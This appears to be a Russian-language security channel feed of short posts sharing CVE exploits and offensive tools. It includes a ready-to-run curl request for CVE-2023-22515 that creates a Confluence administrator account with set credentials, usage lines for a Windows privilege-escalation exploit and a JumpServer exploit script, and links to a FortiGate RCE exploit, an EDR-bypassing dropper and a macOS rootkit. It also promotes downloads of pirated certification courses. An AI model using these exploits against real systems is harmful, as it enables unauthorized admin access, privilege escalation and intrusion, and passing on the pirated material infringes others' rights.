VULN in CURL
get CVE-2023-38545 - поиграться (сегодня patch)

#curl

Update:
How I made a heap overflow in curl

#curl #libcurl #ssrf

CVE-2023-36802
windows Local Privilege Escalation
Usage:
Windows_MSKSSRV_LPE_CVE-2023-6802.exe <pid>
где pid — это идентификатор процесса (в десятичном формате), который требуется повысить до SYSTEM
POC

#win #lpe

Ох твою мать а, не было печали...)))))))))))))))))
Короче, план такой
Надеюсь консультанты из Xpanamas ciscoTalos

CVE-2023-22515
Confluence Data Center and Server - Broken Access Control Vulnerability
POC:
curl -k -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=adm1n&fullName=admin&email=admin@confluence&password=adm1n&confirm=adm1n&setup-next-button=Next" http://confluence/setup/setupadministrator.action

login - adm1n/adm1n

Почитать как это работает

Cordyceps - род спорыньёвых грибов, пиреномицеты, паразитирующие на определённых видах насекомых.
Домен: Эукариоты
Царство: Грибы
*
А кроме того это самоинъекционный дроппер на C++, предназначенный для обхода EDR.
download

#bypass #edr

Внутри JS ?))

ДатаСексуалы на месте ?
Вся туса в сборе: 0day,rce,dos,eop,xss и дюша метЁлкин
Переходите сразу к таблице
Только вот с CVE-2023-36778 НЕ угадали

берут на вооружение )))
ShellBot Uses Hex IPs to Evade Detection in Attacks on Linux SSH Servers

#hideIP #hex #16bit

CVE-2023-42820
Дырка в JumpServer (opensource хост-бастион)

Usage:
python CVE-2023-42820.py -t http://IP:Port -e email -u username

CVE-2023-27997 FortiGate
Разбор - XORtigate: Pre-authentication Remote Code Execution on Fortigate VPN
Скачать - exploit
Дырке 3 месяца - сколько успело проПатчиться расскажет shodan

#fortigate #rce

АНБ (National Security Agency, NSA) не спит ! И мы не будем.
Совсем недавно они выкатывали свежий релиз GHIDRA, Но то ладно, мы со временем Сноудена привыкли.
Сегодня выкатили репозиторий ELITEWOLF.
В котором плавают различные сигнатуры и аналитика, ориентированные на ICS/SCADA/OT.
Занятно, контроллеры там всякие, ребятам из АСУ ТП должно быть интересно.

update: а еще интересно что для публикации они используют github, и каждый "отдел" создает свой ОТДЕЛЬНЫЙ репозиторий, прозрачнее не намекнуть )))

#NSA

OSCP, OSWE, OSEP, OSED, OSDA, OSWA, que OSWE, OSWP, EXP301, EXP312, WEB300, CEH , CEH v3, CEH v12,
CCC , CKLP, Cisco CCNA 200-125 и еще тонна всего
скачать ((((
если вы любитель испанского

#soclose

macOS RootKit
*
Умеет фаззить двоичные файлы/драйверы, выполнять чтение/запись ядра, перехватывать функции ядра и пользовательского пространства, устанавливать пользовательские точки останова, заглушку GDB (в разработке), сопоставлять ядра KDK с символами отладки DWARF для выпуска ядер, MachO всех видов, общий доступ к dyld кэши, метаданные Objective C/Swift, библиотеки дампов, внедрение библиотек (например, cycript) и сканирование приложений iOS.

Криво пропатчили cve-2023-33297
Получился bitcoin botnet ddos attack
Видео + описание

#btc